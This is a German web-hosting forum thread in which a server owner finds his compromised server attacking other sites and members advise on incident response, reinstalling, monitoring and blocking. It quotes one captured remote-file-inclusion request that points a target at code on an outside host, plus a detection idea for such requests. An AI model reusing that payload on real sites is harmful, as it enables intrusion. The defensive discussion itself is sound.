Injection Angriffe von meinem Server auf andere Seiten

[art.vandelay]

Moin,

seit einiger Zeit nun schon laufen Angriffe von meinem Server aus auf andere Seiten, hierbei handelt es sich i.d.R. um Injectionangriffe.

Ich habe mir erstmal die Log-Datein (alle!) angeschaut und mit den Zeitpunkt der Angriffen verglichen konnte jedoch nichts auffälliges Entdecken.

auch netstat -lnp zeigt nichts ungewöhnliches, alles so wie es sein sollte.

Jetzt frag ich mich wie es überhaupt sein kann das mein Server (bzw. ein Programm) Anfragen einfach so stellen kann, wie wird dies aufgerufen? Es gab auch via SSH keine unerlaubten Zugriffe (bzw. zugriffe von IP-Adressen die mir nicht bekannt wären), die Angriffe finden auch nicht zu Zeiten statt in denen ich Online bin, wie könnten diese also gestartet werden?


Kann ich irgendwo sehen welche ausgehenden Anfragen gesendet werden?

 

[PapaBaer]

seit einiger Zeit nun schon laufen Angriffe von meinem Server aus auf andere Seiten, hierbei handelt es sich i.d.R. um Injectionangriffe.

Du bist dir bewusst, dass du, gerade mit dem Wissen um die Situation, mindestens als Störer für Schäden haftbar bist, sollte einer dieser Angriffe erfolgreich sein? Du bist dir auch bewusst, dass ein Injection-Angriff so richtig teuer enden kann, wenn z.B. unternehmenskritische Daten betroffen sind oder abhanden kommen?

Jetzt frag ich mich wie es überhaupt sein kann das mein Server (bzw. ein Programm) Anfragen einfach so stellen kann, wie wird dies aufgerufen?

In den meisten Fällen nicht über SSH. Wahrscheinlich selbst über eine Code-Injection. Entweder eine nicht gepatchte Sicherheitslücke in einem der laufenden Dienste (immer schön updates eingespielt?) oder über eine Web-Anwendung, die nicht sauber programmiert ist. Möglicherweise ist auch ein Rootkit im Spiel. Aus der Ferne kann man nur raten.

Kann ich irgendwo sehen welche ausgehenden Anfragen gesendet werden?

tcpdump und ngrep sind deine Freunde. Viel spannender sind aber eingehende Anfragen, weil sie dir Hinweise geben, was ausgenutzt wird.

Was heißt i.d.R.? Laufen auch andere Angriffe?

 

[Glamdring]

seit einiger Zeit nun schon laufen Angriffe von meinem Server aus auf andere Seiten

Seit einiger Zeit? Und Du hast das Ding noch nicht runter gefahren? Das ist jetzt nicht Dein Ernst, oder?

auch netstat -lnp zeigt nichts ungewöhnliches, alles so wie es sein sollte.

Dein Server tut Dinge, die Du nicht befohlen hast und Du traust noch den Ausgaben der darauf installierten Programme?

Kann ich irgendwo sehen welche ausgehenden Anfragen gesendet werden?

Verlässlich nur noch auf dem vorgelagerten Router.

 

[Hostingparadies]

Die Antwort ist relativ einfach. Du bist gehackt und zu 99% teil eines Botnetzes. Mein wirklich gut gemeinter Rat - sofort neu installieren.

Wir sehen das immer wieder, vor allem wenn Kunden schlechte Passwörter verwenden. Nicht selten dauert es keine 60 Sekunden bis die Angreifer die Passwörter geknackt haben.

Wird bei uns ein Kunde gehackt und greift sein Server andere Netze an ist der Server ganz schnell vom Netz. Nicht nur um andere zu schützen, sondern auch um den Kunden aus der Schusslinie als Mitstörer zu nehmen. Gemäß Gesetzeslage musst Du bei Kenntniserhalt sofort reagieren.

Ich würde also nicht länger warten (denke auch an die AGB des Providers, zu 99% haftest Du ihm für Schäden die durch Deinen Server verursacht werden).

Beste Grüße

Michael

 

[freakshow10000]

Die Antwort ist relativ einfach. Du bist gehackt und zu 99% teil eines Botnetzes.


Michael

Da stimm ich nicht zu,
du bist zu 100% teil eines Botnetzes

 

[PapaBaer]

sofort neu installieren.

Und dabei die ausgenutzte Sicherheitslücke gleich wieder mit drauf ziehen.

1. runterfahren / Rescue Modus
2. Image vom System machen
3. Sicherheitslücke finden
4. Neu aufsetzen und dabei Sicherheitslücke vermeiden

Das Problem ist, dass gerade Punkt 3 mit mangelnden Kenntnissen schwierig wird. Das ist genau der Punkt, wo der Plesk-Klicker gegen die Wand fährt (naja, der 2. Punkt, der Server ist ja schon an die Wand gefahren). Also besser: Geld in die Hand nehmen (wer sagte nochmal, das vServer ja so günstig sind) und eine professionelle Firma beauftragen. Alles andere führt dazu, dass der Server in einer Woche wieder gecrackt wird.

 

[Hostingparadies]

Neu aufsetzen und dabei Sicherheitslücke vermeiden

100% ACK, war für mich selbstverständlich.

 

[art.vandelay]

Diese reaktion hatte ich befürchtet.

Ja, ich gebe zu, ich habe die Situation absolut unterschäzt - das war verdammt dumm und zum Glück ist dabei nichts passiert.

Ich würde aber trozdem gerne wissen was da passiert ist, damit mir das beim erneuten Aufsetzten nicht noch mal passiert.

Ich habe jetzt einen tcp dump Erstellt und denn versucht mit Wireshark zu analysieren. Hierbei bin ich auf einige (HTTP-)Pakete gestoßen, die als Quelle meine IP und als Ziel eine Fremde haben. Unter dem Punkt Info steht damm immer sowas wie transcedge/contact.php//page.php?page=http://211.60.155.3/skin/c.txt?? - Gehe ich recht in der Annahme das dies die Angriffe von meinem Server nach außen sind?

Ein gewisses Grundverständnis von Telematik habe ich, will heißen ich kann schon nachvollziehen was da nun steht.

Gibt es eine Möglichkeit zu erfahren wie das Paket erstellt wurde bzw. von wem, vorausgesetzt die Informationen da drin stimmen überhaupt? Oder steht da nur meine Netzwerkkarte drin (Naja, der Rest interessiert ja auch eigentlich niemanden...)


PS: Wie haben denn die Menschen die bei solchen Firmen arbeiten gelernt einen Server zu managen? Wie habt ihr das gelernt? Seit ihr mit dem Wissen geboren und tragt es nun in die Welt hinaus? - Will heißen: Wenn man lernen will muss man auch mal auf die Fresse fliegen - Das mein Verhalten falsch war weiß ich ja jetzt, aber nur aus Fehlern wird man schlauer!

 

[schnoog]

Ich denke der vernüftigste Weg (für nicht ITler) was über Serveradministration zu lernen ist:

Eine VM mit ServerOS aufzusetzen und entsprechende Lektüre zu verschlingen.

Alternativ gibts Ausbildungen, Studiengänge, Kurse etc. die sich mit der Thematik befassen.

 

[seraphim]

Die Leute haben gelernt indem sie in der Regel keine Server online als Spielwiese genommen haben sondern sich eine VM aufgesetzt haben mit der man völlig gefahrlos alles durchspielen und simulieren kann.

Und ja, von deinem Server aus werden Angriffe auf andere Server ausgeführt.
Es sieht mir sehr nach einer Infektion mit einem Rootkit aus, vllt über eine PHPShell durchgeführt.

Erste Aktion: Server vom Netz nehmen, im Rescue booten, alle notwendigen Daten sichern und verifizieren und den kompletten Server neu aufsetzen. Solltest du alte Programmversionen oder vllt. auch alte Foren/BlogCMS einsetzen updaten oder weglassen.

Zweite Aktion:
Alles was du auf dem Server produktiv einsetzt IMMER aktuell halten! Das geht von dem kleinsten Modul für Perl bis hin zum Kernel. Auch PHP CMS müssen laufend Updates eingespielt bekommen.

Wenn du nur einige Websites/Mail Accounts hostest dann würde ich mir überlegen ob du nicht besser mit der Nutzung eines einfachen Webhosting Angebotes bedient bist.

 

[Glamdring]

Ja, ich gebe zu, ich habe die Situation absolut unterschäzt - das war verdammt dumm und zum Glück ist dabei nichts passiert.

Wie man's nimmt: Meiner Meinung nach ist etwas passiert, wenn ein Server zum Angriff auf andere Server benutzt wird.

Ich würde aber trozdem gerne wissen was da passiert ist, damit mir das beim erneuten Aufsetzten nicht noch mal passiert.

Wenn bereits "einige Zeit" vergangen ist, ist es fast aussichtslos, das herausfinden zu wollen. Der Angreifer hat höchstwahrscheinlich die Spuren soweit möglich verwischt. Und selbst wenn die Logs nicht manipuliert wurden, sind sie möglicherweise schon wegrotiert worden.

Ich habe jetzt einen tcp dump Erstellt

Mit Tools, von denen nicht klar ist, ob sie die Realität anzeigen. Kann sein, kan nicht sein, die Mühe es herauszufinden lohnt sich eher nicht.

PS: Wie haben denn die Menschen die bei solchen Firmen arbeiten gelernt einen Server zu managen? Wie habt ihr das gelernt?

Seit ~1990 learning by doing und lesen von Dokumentation zu Hause, nach beruflicher Umorientierung ab ~2000 Betreuung von Servern im freien Netz und der firmeneigenen IT, später auch die eine oder andere Schulung und Betreuung von Kunden-IT. Seit 09 nur noch privat auf den eigenen Maschinen root und wenn es notwendig ist, beim Kunden mal 'ne Kiste anzupacken.

Will heißen: Wenn man lernen will muss man auch mal auf die Fresse fliegen - Das mein Verhalten falsch war weiß ich ja jetzt, aber nur aus Fehlern wird man schlauer!

Fehler macht man aber am Besten in der Sandbox zu Hause.

 

[PapaBaer]

zum Glück ist dabei nichts passiert.

Das weißt du woher genau? Was bei den von deinem Server aus attackierten Systemen passiert ist, weißt du nicht. Möglicherweise ist auf Grund deiner Lücke ein anderes System ausgefallen. Wie bereits geschrieben: Du haftest für Folgeschäden mit.

Hierbei bin ich auf einige (HTTP-)Pakete gestoßen, die als Quelle meine IP und als Ziel eine Fremde haben.

Wie ich auch bereits geschrieben habe, bringen dir ausgehende Pakete keine weiteren Informationen, als den von deinem Server ausgehenden Angriffen zuzuschauen. Ja, das sind Injection-Angriffe. Ja, das weißt du schon. Ja, das sind genau die Pakete, die richtig teuer für dich werden, wenn sie irgend einen Treffer landen. Aber schau ruhig noch ein wenig zu, wie es passiert ...

Du musst deine Lücke finden. Wenn du auf Harakiri stehst, kannst du die EINGEHENDEN! Pakete durchsuchen und hoffen, das in der Zwischenzeit hintenrum nix anbrennt.

Gibt es eine Möglichkeit zu erfahren wie das Paket erstellt wurde bzw. von wem, vorausgesetzt die Informationen da drin stimmen überhaupt?

Eingehende Pakete. Aber die kommen sicher auch nur von Servern, die auf Grund mangelnden Wissens gecrackt wurden. Du könntest allerdings eventuelle Schadensersatzansprüche durchreichen, wenn die Quelle in D-Land ist.

Mal ganz grundsätzlich zum Verständnis: Die Pakete, die da als Angriffe rausgehen kommen nicht von irgendwem, sondern von deinem Server allein. Dein Server leitet die Angriffe nicht von irgend jemanden weiter, er startet (!!!) sie von sich aus. Warum da jemand deinen Server dazu bekommt Angriffe zu starten, ist eine gänzlich andere Frage als die Angriffe selbst. Es gibt viele Wege: BruteForce, Rootkit, Remote-Shell, Buffer-Overflows, Code-Injection in Web-Apps, ... der ganze Blumenstrauß an Hässlichkeiten.

PS: Wie haben denn die Menschen die bei solchen Firmen arbeiten gelernt einen Server zu managen?

Seit 1998 mit Computern gespielt, seit 1999 mit Linux. Basteln, coden, ausprobieren, lernen, lesen. Ab 2004 nen alten Rechner zu Hause als Server betrieben. Weiter lernen und lesen. Auf Kongresse fahren und sehen, wie der Hase läuft. 2008 den ersten eigenen vServer gemietet und verdammt gut aufgepasst, das nix anbrennt. Weiter lernen und lesen ...

 

[Hostingparadies]

das war verdammt dumm und zum Glück ist dabei nichts passiert.

Das kannst Du nur hoffen

Ich würde aber trozdem gerne wissen was da passiert ist, damit mir das beim erneuten Aufsetzten nicht noch mal passiert.

Der richtige Weg wäre den Server abzuschalten und einen Computer Forensiker ran zu lassen.

transcedge/contact.php//page.php?page=http://211.60.155.3/skin/c.txt?? - Gehe ich recht in der Annahme das dies die Angriffe von meinem Server nach außen sind?

Ja. Hier wird versucht Fremdrechner zu infizieren. Zu 99% bist Du auf die gleiche Weise infiziert worden.

Gibt es eine Möglichkeit zu erfahren wie das Paket erstellt wurde bzw. von wem, vorausgesetzt die Informationen da drin stimmen überhaupt?

Ich bin mir sicher dass Du den Angreifer in Deinen httplogs findest. Suche nach dem gleichen Muster des Angriffs nur eben mit Deiner IP bzw. deinen Domainnamen als Ziel

PS: Wie haben denn die Menschen die bei solchen Firmen arbeiten gelernt einen Server zu managen?

Ausbildung, Studium, private Weiterbildung, Fortbildung, Neugier, Enthusiasmus, Schulungen, Kurse, usw.. Ich habe mit 15 angefangen (Sinclair ZX81 ) und blicke auf 30 Jahre Bits- und Bytes zurück. Da bleibt das ein oder andere hängen

 

[Perry_Rhodan]

Wie habe ich bzw. lerne ich Linux?

~5% ausprobieren
~5% Schulungen,Lehrgänge etc.
~90% ist selber Lernen (Selbststudium)

Leider gibt es an den VHS und/oder anderen Schulen keine vernünftigen/tiefergehenden Linuxkurse. :-( (meiner Meinung nach eine Marktlücke, nur kann ich Linux nicht gut genug um anderen was beizubringen)

Linuxkurse von Firmen sind (unangemessen) teuer. Da schlagen 1-2 Tageskurse schonmal mit deutlich über 1.000 Teuronen pro Person zu buche. Da sollen zwar auch "nur" 6-12 Teilnehmer dabei sein, aber ich bin weder bereit, soviel Geld auszugeben noch kann ich es. Auch finde ich eine evtl. Gegenleistung keine 6-12.000 Euro wert.(je nach Teilnehmerzahl) Aber es zwingt ja keiner einen, an solchen Schulungen teilzunehmen.

Mein damaliger Dozent an der VHS (wo ich die Linuxgrundlagen lernte) fand zwar auch, das tiefergehende Linuxkurse nützlich, sinnvoll und brauchbar wären, aber auch er ist nicht bereit, solche Kurse zu geben, obwohl er davon ausging, daß solche Kurse genau wie die Grundlagenkurse zu 100% ausgebucht sein würden.

Ich kann Dir nur raten, wie einige vor mir auch, suche Dir eine Person, die sich extrem gut mit Linux auskennt und lasse den Server von dieser Person durchforsten. Evtl. findet diese Person die Lücke und (was sehr unwahrscheinlich ist) auch den Angreifer.

 

[art.vandelay]

ich vermute mal das einer der user ein komprimierendes script hoch geladen hat und es dadurch zu der infektion kam, ich habe einige befremdliche php-scripte gefunden die darauf hindeuten.... naja, ich hab nun alles neu aufgesetzt und werde mal die apache logs im auge behalten und schaun wie man sowas wieder verhindern kann
im übrigen habe ich den server gar nicht aufgesetzt sondern das war schon jemand mit erfahrung und sicheres passwort habe ich sowieso benutzt.... auch bin ich kein "plesk-klicker" oder ein kiddie das unbedingt einen server haben wollte, das hat schon seinen sinn

während ich auf fehlersuche war hab ich mit iptables auch den ausgehenden port 80 geblockt, so liefen auch keine weiteren angriffe mehr, aber ist natürlich keine dauerhafte lösung.

meine frage wäre da noch: gibt es ein (kostenloses) tool mit dem man die apache2 logs überwachen kann und bei potentiellen angriffen eine mail bekommt, um so zeitnah etwas dagegen tun zu können (jaaa, auch wenn es vielleicht dann schon zu spät sein könnte blablabla) oder muss ich mir da selber etwas schreiben?

 

[blocklist]

Du könntest z.b. Fail2Ban verwenden um die Apache-Logs zu überwachen.
Da richtest du dir dann einen eigenen Filter ein der auf entsprechende RFI/LFI-Muster matcht und Fail2Ban sendet dir dann eine Mail.

http://www.blocklist.de/downloads/fail2ban.config.debian6.tar.gz -> apache-spamtrap-rfi.conf
Kann allerdings je nach Programmierung und URLs eine hohe false-positive-rate haben. Aber zur Überwachung reicht es aus.

 

[Deleted member 4401]

Um RFIs schon im vornherein zu blockieren würde ich zu ModSecurity raten, einfach eine Regel erstellen die beim String =http//: anspringt.
Auch auf Snort solltest du mal einen Blick werfen.